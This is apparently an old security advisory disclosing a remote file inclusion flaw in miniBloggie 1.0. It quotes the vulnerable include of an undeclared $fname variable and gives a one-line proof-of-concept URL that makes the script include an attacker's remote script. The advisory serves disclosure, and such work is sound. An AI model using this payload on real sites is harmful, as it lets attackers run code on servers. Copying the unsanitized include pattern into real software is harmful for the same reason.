--------------------------------------------------------------------------------------- miniBloggie 1.0 fname Remote File Inclusion --------------------------------------------------------------------------------------- Author : Sh3ll Date : 2006/05/01 HomePage : http://www.sh3ll.ir Contact : sh3ll[at]sh3ll[dot]ir --------------------------------------------------------------------------------------- Affected Software Description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : miniBloggie version : 1.0 Venedor : http://www.mywebland.com Class : Remote File Inclusion Risk : High Summary : minibloggie, a mini blog script yet effective built using fast template for easy customisation. Using Mysql database system with edit, delete, , support smiley & BBcode, adminstrator log in for easy website management. --------------------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ The Problem Exists Is in The cls_fast_template.php When Used The Variable in a $fname include() Function Without Being Declared. ---------------------------------cls_fast_template.php--------------------------------- .... <?php else { fclose($fp); include $fname; return; } ... --------------------------------------------------------------------------------------- PoC: ~~~ http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script] Solution: ~~~~~~~~ Sanitize Variabel $fname in cls_fast_template.php ---------------------------------------------------------------------------------------- Note: ~~~~ Venedor Contacted, But No Response. So Do a Dirty Patch. ---------------------------------------------------------------------------------------- Shoutz: ~~~~~~ ~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena ~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
